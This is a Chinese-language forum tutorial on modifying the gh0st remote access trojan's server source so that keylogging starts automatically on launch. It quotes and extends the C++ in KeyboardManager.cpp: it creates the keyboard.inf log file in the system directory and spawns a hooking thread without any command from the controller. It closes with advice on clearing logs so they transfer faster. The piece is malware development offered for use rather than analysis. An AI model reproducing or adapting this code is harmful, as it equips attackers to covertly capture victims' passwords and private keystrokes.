gh0st远控服务端直接开启键盘记录

gh0st远控服务端直接开启键盘记录

闲时玩远控，私下有很多站友想在gh0st服务端运行的同时开启键盘记录，苦于对代码不熟，到处求人，还让人给拿一把，我在这里给出实现方法，希望对gh0st爱好者有所帮助。在KeyboardManager.cpp的bool CKeyboardManager::StartHook()方法中，有这样一段代码：

ZeroMemory(m_pTShared->str,

sizeof(m_pTShared->str));

GetSystemDirectory(m_pTShared->strRecordFile,

sizeof(m_pTShared->strRecordFile));

lstrcat(m_pTShared->strRecordFile, "\\keyboard.inf"); //keyboard.inf是自己给的记录文件名// 文件存在，就开始离线记录开启

if (GetFileAttributes(m_pTShared->strRecordFile) != -1)

m_pTShared->bIsOffline = true;

else

m_pTShared->bIsOffline = false;从这段代码可以看出，服务端启动后，自动判读有没有keyboard.inf这个文件，如果有，就自动开启离线记录，如果没有就默认没有开

启键盘记录。我们在类构造的时候加上如下代码：char strRecordFile [MAX_PATH];

GetSystemDirectory(strRecordFile, sizeof(strRecordFile));

lstrcat(strRecordFile, "\\keyboard.inf");

if (GetFileAttributes(strRecordFile) == -1)

{

HANDLE hFile = CreateFile(strRecordFile, GENERIC_WRITE, FILE_SHARE_WRITE, NULL,

CREATE_ALWAYS,

FILE_ATTRIBUTE_NORMAL, NULL);

CloseHandle(hFile);

}在类初始化的时候，我们判读有没有键盘记录文件，如果没有，则自动创建一个新的键盘记录文件，服务端就会默认开启键盘记录了，这样就不用特意再打开服务端控制。

当然单单这样还是不够的，代码中的实现是在连接到控制端以后，为此，我们只需要创建一个单独的线程，只要服务启动后，自动启动键盘记录，类似代码如下：if (CKeyboardManager::g_hInstance != NULL)

{

...

HANDLE hKeyboadThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_HookKeyboard,

NULL, 0, NULL, true);

}当然，要注意定期清理键盘记录哦，不然记录文件大了，传输会非常慢的。